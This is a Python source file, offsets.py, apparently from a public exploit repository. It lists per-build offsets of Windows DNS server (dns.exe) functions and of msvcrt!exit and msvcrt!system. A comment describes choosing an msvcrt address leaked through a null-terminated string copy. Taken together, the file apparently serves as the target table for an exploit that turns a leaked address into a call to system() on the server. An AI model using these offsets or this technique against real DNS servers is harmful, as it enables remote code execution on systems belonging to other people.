-
Notifications
You must be signed in to change notification settings - Fork 63
/
offsets.py
61 lines (58 loc) · 4.74 KB
/
offsets.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
dnsoffsets = { # (dns!RR_Free, dns!string):(dns!RR_Free, dns!NsecDnsRecordConvert, dns!_imp_exit)
(0x5C0, 0xF88):[(0x745C0, 0x170910, 0x18EBF8), # 011302BE2F23F9F73D2988992DD1E0BB1
(0x745C0, 0x1708E0, 0x18EBF8)], # 87978EA1EDCA23F37E95D2493B7C5D951
(0xE20, 0xDD8):(0x72E20, 0x16D150, 0x18BB18), # 151173287575479C0F95BBA89A77FD211
(0xB30, 0xAF8):(0x6DB30, 0x161A10, 0x17FB48), # 121B09047E4ACAE11D392CD54B858BEC1
(0x0E0, 0xB78):(0x730E0, 0x16D0A0, 0x18BB10), # 26F4F38E8B084F1C9BCB1800DF1BAB511
(0xA30, 0xFA8):(0x74A30, 0x170E30, 0x18FBF8), # 2A0D9CCEE7FE2FCC0E589B850D682BE11
(0x100, 0xCE8):[(0x71100, 0x168300, 0x185B40), # 2C12CA6B7E5351E91C8CD14F391CCA781
(0x71100, 0x1682F0, 0x185B40)], # DD2CBF9B66507D5A001066A8FE393D981
(0x250, 0xD48):(0x72250, 0x169540, 0x187B48), # 30795D39DB1D1B784571D7E15DDBE0A61
(0x680, 0xB38):(0x72680, 0x16C280, 0x18AB10), # 384AC9D18DA74834AFCBE4D0D404EEC01
(0x630, 0xB38):[(0x72630, 0x16C120, 0x18AB10), # 3A0916A513EF4F0487CCA386725383781
(0x72630, 0x16C1F0, 0x18AB10), # 98EAF13B1C7546049C2B7613404F92BB1
(0x72630, 0x16C1E0, 0x18AB10)], # C8797339F2CB4E34AE92E08DE31531DD1
(0x168, 0xA28):(0x74168, 0x12B7AC, 0x182640), # 3C175EE92CE9411196911477C241DCA51
(0x750, 0x568):(0x6D750, 0x1663C0, 0x16EE80), # 46CB75D83C814E689BE8367938E9A8AE1
(0xE90, 0xE08):(0x72E90, 0x16D1C0, 0x18BB18), # 512B4E7C391E56392C02A3208F33EC671, 6872C747AA55A5056E97FB67B510A37B1
(0x680, 0xB68):[(0x72680, 0x16C280, 0x18AB10), # 57EF7C49756A48379AD6DD03EA2CC1F91, 862B29C6A6A845EC9FC6953480795C601
(0x72680, 0x16C300, 0x18AB10)], # 657A79890FC549AC972E2D3484BA16E61
(0xCB0, 0x988):[(0x6ECB0, 0x1663D0, 0x184B18), # 58434840C8D5492DB39839C6653A19291, 5D740018863347A99C1B6837E362888B1
(0x6ECB0, 0x166420, 0x184B18)], # BE42CEE2F847489AA8F4EEBCA9508AAA1, CCCE6B4727D04E45A4B84E9598B20A281
(0xE90, 0xDD8):(0x72E90, 0x16D1C0, 0x18BB18), # 5B2FE25AB741C36ABDE937A1538758851
(0x080, 0xE08):[(0x73080, 0x16D450, 0x18BB18), # 5B618CB33807399ECCE94BF53B5315311
(0x73080, 0x16D420, 0x18BB18), # 5E1835E78D7B96684E6D768BCBC4DA671
(0x73080, 0x16D3B0, 0x18BB18)], # D0B1179759CE98E5904423ABAB7886AC1
(0x120, 0xB78):(0x73120, 0x16D150, 0x18BB10), # 6D2B4D6B8ED94CD8AD7256BE45BE3A7D1
(0xAB0, 0xFB8):(0x74AB0, 0x1717A0, 0x18FBF8), # 80442E584F9BFFB3D39CA65D3E15052E1
(0xB30, 0xAD8):(0x6DB30, 0x161720, 0x17FAF8), # 89F06DEA8817361E8A80A4B1D2309EA31
(0x730, 0xB68):(0x72730, 0x16C500, 0x18AB10), # 91A76A8D7FEF46368B3CADA7CA0B85321
(0x630, 0xF88):(0x74630, 0x170940, 0x18EBF8), # 9D7E11D9822326ACD3DC906A76CC9CE81
(0x270, 0xB88):(0x73270, 0x16D340, 0x18BB10), # A2958B61A2FB4DF3A509954427462D121
(0x50C, 0xFF8):(0x7950C, 0x13C570, 0x18EE28), # A3A3EE855EE840F7AF44C1114A7568841
(0xA10, 0x898):(0x6AA10, 0x157260, 0x15FF28), # B0FF48A3AAB24EEA9ABC6819F00D16E01
(0x9E0, 0xFA8):(0x749E0, 0x170DE0, 0x18FBF8), # B94B9B668BC0A17C42EC9B62CFA27C9D1
(0x380, 0xCE8):[(0x71380, 0x168570, 0x186B40), # CBE3C9FF59D24A56C677A1360A0488801
(0x71380, 0x1685F0, 0x186B40)], # E0D72EDD8F6CD476D7D16D50BEA1840B1
(0xB90, 0xAD8):(0x6DB90, 0x161790, 0x17FAF8), # D79B656A0E410B499495ACA68FE82B1C1, EAE1AF9FAB0BD6A67718282AE36129051
(0xE70, 0xAF8):(0x6DE70, 0x161EB0, 0x17FB48), # E3820363DC6A7C0663241EF2907D46AF1
(0xAE0, 0xAE8):(0x6DAE0, 0x161910, 0x17FB38), # E98B788CA7E1BF518D31EFF7CE12E8681
(0x220, 0xB88):(0x73220, 0x16D2F0, 0x18BB10), # F273AF47E4A94A6CABCE7F5AB69404051
(0xB80, 0xAF8):(0x6DB80, 0x161A60, 0x17FB48), # FCACA0C020F355530E053DE1AE347BFD1
}
# If the offset ends in a null byte, pick a different msvcrt.dll address for dns!_imp.
# This address is leaked from a null terminated string copy.
vcrtoffsets = { # (msvcrt!exit, msvcrt!system)
0x8C0:(0x3A8C0, 0x17EC0), # 1FEA8DB6B57F5FBFA935E090243420D01
0x15C:(0x0615C, 0x565B0), # 31BECC4756744732A05F68E6F39589562
0x8F0:(0x3A8F0, 0x17F10), # 32501CCF4A34462A8A9A6F1AD7494E7E1, 3AEEACDC9BF0459494C96F68D96236B21
0xB20:(0x3AB20, 0x18110), # 4A088EC06E01435FA64A606EA9CD624B1
0x7D0:(0x3A7D0, 0x17E50), # 8B174CB6831C3F221C14DB6F010A3BA71
0x190:(0x3A190, 0x17A40), # 92D35601E6183C93F1EB3A15BE720BBC1
0x930:(0x3A930, 0x17EB0), # 97E165A3E28A5645BB9A295D9DBFBE901
0x05C:(0x0905C, 0x1F45C), # A11C26B8EDDC4E2D8D039DB941D1B4DA2
0x960:(0x3A960, 0x17EB0), # B40D63CF4E05FF62BDDF63550F5FBEF51
0xB30:(0x3AB30, 0x18120), # BAFC8C0A0A7648E0A6C2FC97B72A04B11
0x350:(0x3A350, 0x17A80), # D6265247309A824B989B0487E235D7431
0x6B0:(0x3A6B0, 0x17B40), # D8A568AED31660BB014D4F525B4E87E91
}